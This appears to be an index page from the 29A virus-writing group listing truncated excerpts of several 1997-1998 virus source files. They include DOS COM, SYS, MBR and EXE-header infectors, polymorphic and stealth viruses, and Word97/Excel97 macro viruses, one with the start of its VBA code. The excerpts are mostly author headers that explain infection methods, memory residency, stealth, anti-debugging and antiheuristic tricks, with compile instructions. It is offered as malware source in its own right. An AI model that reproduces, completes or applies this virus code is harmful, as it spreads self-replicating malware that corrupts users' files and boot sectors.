29A

comment * Ida.1490 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ Ida.1490 is a 1491 bytes parasitic resident COM virus. Infects files at open file, get or set file attributes, load and execute program and rename file by appending the virus to the infected file. Ida.1490 has an error handler, non-destructive payload, second layer 16-bit exclusive OR (XOR) encryption in file and is polymorphic in file using its internal polymorphic engine. Ida.1490 is using the Random Decoding Key (RDK) technique. I would like to thank VirusBuster for pr...

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[sysv.asm]ÄÄ ;[SysV] Resident SYS infector ;Copyright 1998 (c) Vecna ; ;This tiny virus, written to CyberYoda 150 bytes virus contest, is a resident ;SYS infector. It infect all SYS files closed(this mean copyed too). It use ;interruption substitution as a effective antidebugging trick against real ;mode debuggers, and goes resident in the IVT. ; ;At load, the infected SYS jump to the virus installer, that check for a copy ;already resident. If so, we return to the host, else we copy ourself to the ;IVT at 0x20:0, hook interrupt 0x21, saving the original vector to interrup...

; . . . . . ; .:: .:.. .. .:.::. :.:. ; <<-=ÜÛÛÛÛÛÜ.ÜÛÛÛÛÛÜ.ÜÛÛÛÛÛÜ==< ; .:ÛÛÛ ÛÛÛ:ÛÛÛ ÛÛÛ.ÛÛÛ ÛÛÛ::. ; :: .ÜÜÜÛÛß.ßÛÛÛÛÛÛ:ÛÛÛÛÛÛÛ .:. ; .:..ÛÛÛÜÜÜÜ.ÜÜÜÜÛÛÛ.ÛÛÛ ÛÛÛ.::.: ; .:>===ÛÛÛÛÛÛÛ:ÛÛÛÛÛÛß.ÛÛÛ ÛÛÛ==->> . ; ..: ::. . .:..Laboratories .:.. :.. ::.. ; ; ; Replicant name.............Ithaqua ; Brain engineer.............Wintermute/29A ; Model......................Advanced Nexus-6 Final Beta ; Corporal type..............Unknown ; Size.......................8543 celular units ; Date of Birth..............28/9/1998 ; Date of Termination........Reserved ; ; ; Ithaqua replicant significative data ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ...

{ [Nutmeg2] Turbo Pascal Multipartite EXE/MBR infector Copyright 1998 (c) Vecna This is the first know virus written in HLL that infect the MBR also. It infect the owner of the envirment in each interupt 0x28 call, that is called when DOS is idle. The virus place itself in the start of the infected file, adding 4096 bytes to it. It is a prepender that reexecute the host, but with the original name, so, if the host program goes memory resident, MEM.EXE dont show a foreign program as resident. It also have the so called "host stealth", infecting all files, including these with self-checks. Two external assembler routines are used to gi...

;[ANCEV] Multipartite MBR/COM stealth infector ;Copyright 1998 (c) Vecna ; ;When started, the virus check if a PSP exist in ds:0. If true, then we are in ;a infected file, so, we should infected the MBR and return to the host. A ;quick check for memory resident copy is done then. To infected the MBR, we ;read it, and check for a 0xE8 opcode(call). If it exists then we already are ;in the MBR, and dont infect it again. The clean copy of the MBR is stored ;in 0/0/2, and the MBR is overwritten by the virus code and memory contents, ;but before we write it, we put the marker (0xAA55) in the offset 0x1FE. The ;partition table is o...

comment ^ DOS.ExeHeader.Numbless.512 (c) 1998 by Jacky Qwerty/29A. Description Ok, I had never written an ExeHeader virus, so I wrote this. It's a simple DOS EXE infector which spreads by inserting itself through the blank spaces of the exe header left by several compilers and assemblers. It basically converts an EXE file into a COM image, hooks Int 13h and monitors disk reads/writes at the sector level. When "something" looks like an MZ header the virus looks for enough blanks in such header and copies itself to there. The virus is "full stealth" and doesn't infect EXE files larger than 64 Kb for obvious reasons. It neither infe...

=========================== Strange Days by Reptile/29A --------------------------- This is the first macro ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ virus (written in VBA) that ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ can infect doc files and ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ normal.dot (word97) as well ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ as xls files and ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ personal.xls (excel97). =========================== Here is the original source of Strange Days (called Teocatl.A by AVerz :P). http://www.avp.ch/avpve/macro/xmulti/teocatl.stm: ---------------------------------------------------------------------------- Macro.Excel97/Word97.Teocatl This...

'='='='='='='='='='='='='='='='='='='='='= ' Shiver[DDE] by ALT-F11 /AVM ' The First Macro Virus To Use DDE ' Cross Application Virus (Word97/Excel97) ' Does NOT Need Debug.exe To Cross Infect '='='='='='='='='='='='='='='='='='='='='= Attribute VB_Name = "Module1" Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal strClass Name As String, ByVal lpWindowName As Any) As Long Public ExcelFound, WordFound, Marker, JustRun As Boolean Sub AutoExec() On Error Resume Next Call WordStealth If UCase(Dir(Application.StartupPath & "\Word8.dot")) <> "WORD8.DOT" Then Documents.Add Template:="", NewTemplate:=False Open "c:...

;=====( DSA2 Virus by Rajaat / 29A )=========================================== ; ; Virus name : DSA2 ; Author : Rajaat / 29A ; Origin : United Kingdom, December 1997 ; Compiling : Using TASM ; ; TASM /M DSA2 ; TLINK /T DSA2 ; Targets : COM files ; Size : 245 bytes ; Resident : Yes, doesn't decrease memory ; Polymorphic : No ; Encrypted : No ; Stealth : No ; Tunneling : Uses SFT to avoid some monitors ; Retrovirus : No ; Antiheuristics: Only TBSpoof ; Peculiarities : It won't get far ; Drawbacks : Don't write me, I know all of them ;-) ; Behaviour : When an infected COM file is executed, the virus will ; go resident in th...

;=====( Weird Al Virus by Rajaat / 29A )======================================= ; ; Virus name : Weird Al ; Author : Rajaat / 29A ; Origin : United Kingdom, March 1998 ; Compiling : Using TASM ; ; TASM /M WEIRDAL ; TLINK /T WEIRDAL ; Targets : MBR & COM files ; Size : 512 bytes ; Resident : Yes, from MBR only (no TOM decrease) ; Polymorphic : No ; Encrypted : No ; Stealth : MBR only, reads and write ; Tunneling : Uses SFT to avoid some monitors ; Retrovirus : Yes, it uses the recursive extended partition trick ; Antiheuristics: Not deliberately ; Peculiarities : Nothing, I think, it's been a little exercise for me ; Drawb...